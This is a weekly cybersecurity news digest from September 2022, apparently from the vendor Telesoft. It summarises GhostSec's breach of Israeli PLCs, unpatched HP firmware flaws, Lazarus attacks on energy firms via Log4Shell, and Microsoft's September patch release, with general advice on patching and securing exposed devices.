This Week in Cyber 16 September 2022

Israeli Berghof PLCs compromised by Hacktivist Group GhostSec

Self-proclaimed vigilante group GhostSec have claimed responsibility for the compromise of 55 Berghof PLCs (programmable logic controllers) used by organisations in Isreal as part of a “Free Palestine” campaign. This breach was investigated by cybersecurity firm OTORIO who discovered the PLCs were public internet facing and were easily accessible due to the simple credentials.

GhostSec posted a video on its Instagram on the 4th of September demonstrating a successful login attempt into the PLCs admin account. They followed this up by dumping the stolen data from the controllers. The breach of PLCs indicates the groups shift into SCADA (supervisory control and data acquisition) setups and have more recently begun to post screenshots of a further breach into the SCADA network, showing access to a control panel that can be used to change the pH and chlorine levels in water.

This attack luckily had little impact on the affected organisations, but it was easily avoidable. It’s vitally important that devices should be checked to make sure they are not internet facing if they shouldn’t be, and that all internet facing devices are secured by complex passwords and encrypted data streams.

High Severity Vulnerabilities Discovered in HP Enterprise Devices

Several months after public disclosure, HP haven’t released patches to critical vulnerabilities in their high-end notebooks that would allow attackers to execute arbitrary code at the highest privilege level. These vulnerabilities are all between 7.5 and 8.2 as rated by CVSS and include Out-of-bounds write abilities, improper input validation and buffer overflows. These were first reported as far back as April 2022. Binarly, a firmware security organisation first revealed the issues at the Black Hat conference in mid-August 2022 and said that the vulnerabilities aren’t able to be detected by the firmware monitoring due to the TPM (Trusted Platform Module) measurement. Firmware attacks can be particularly dangerous as the threat actor would be able to establish long term persistence and survive reboots. It even has the capability to evade OS level protection.

Patching is imperative to keep systems secure as threat actors can use unpatched systems as a gateway to gain access to private networks and critical systems.

Energy Providers Hacked by North Korean Threat Group Lazarus

It’s recently been reported that the North Korean group, Lazarus, have been targeting energy providers around the world between February and July 2022. Symantec and AhnLab had disclosed some of this back in April and May, but Cisco Talos has since been providing more information and looking further into the attacks. Lazarus had been exploiting the Log4j vulnerability ‘Log4Shell’ on unpatched VMWare Horizon servers to gain initial access to the affected organisations by using a reverse shell to create their own user accounts. The tools used by the threat actor were found by Cisco Talos to be VSingle, a RAT (Remote Access Trojan) used to execute arbitrary code; Yamabot, a malware used to connect to a command and control server; and MagicRAT, a RAT used to access the victim systems. The attack aimed to persist in the long term and exfiltrate data from energy providers in several companies including the US, Canada and Japan.

Microsoft Releases September 2022 Security Updates - 63 flaws fixed

Microsoft has released updates to address multiple vulnerabilities in Microsoft software including fixes for an actively exploited Windows vulnerability and a total of 63 flaws. Five of the fixes are classified as 'Critical' as they enable remote code execution.

The vulnerability being actively exploited is being tracked as CVE-2022-37969 Windows Common Log File System Driver Elevation of Privilege Vulnerability and Microsoft advise that an attacker who successfully exploited this vulnerability could gain SYSTEM privileges. More information is detailed within the Microsoft Release note https://msrc.microsoft.com/update-guide/releaseNote/2022-Aug

Whilst patching can be time consuming and impactive, it is an important element of ensuring your company is safe and secure from cyber attacks. As part of Telesoft's Managed Detection and Response service we provide continuous vulnerability assessment, rapid alerting and remediation advice coupled with our Threat Hunting Service to help protect organisations from the impact of critical vulnerabilities.